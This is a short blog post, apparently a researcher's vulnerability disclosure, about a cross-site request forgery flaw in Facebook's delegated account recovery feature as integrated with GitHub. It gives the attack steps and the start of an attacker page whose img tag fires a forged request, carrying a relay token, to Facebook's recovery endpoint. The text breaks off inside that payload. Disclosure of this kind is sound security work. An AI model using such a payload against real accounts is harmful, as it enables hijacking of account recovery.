Note this is going to be a quick post. This year, at Enigma 2017 Conference , Facebook introduced a way to move Account Recovery beyond Email and the "Secret" Question . After the presentation the moved operationally and presented the first integration partner : Github . These days I have seen a lot of press around this and both Facebook and Github open sourced their implementation and s pecification (also presented at F8 ). Well it turned out that Facebook side was susceptible to Cross Site Request Forgery. Really simple explanation: The attacker start the integration with Github and stop the flow at the right moment. The create an attacker page as https://github.com/asanso/asanso.github.io/blob/master/facebook/test_fb.html <html> <img src="https://www.facebook.com/recovery/delegated/save/?fr=OkpK%2FnF9oZk%3D& relay_token=AfFdhnFYiPWXlcS17dG19Tz4sJT%2B%2FzBorBbDwEKgNMvxUHRIqMAnmmEGrGZlMheUfJdNHv40xyraKOfj64fR7ZgZ8HNNmincyRiHdu6Nju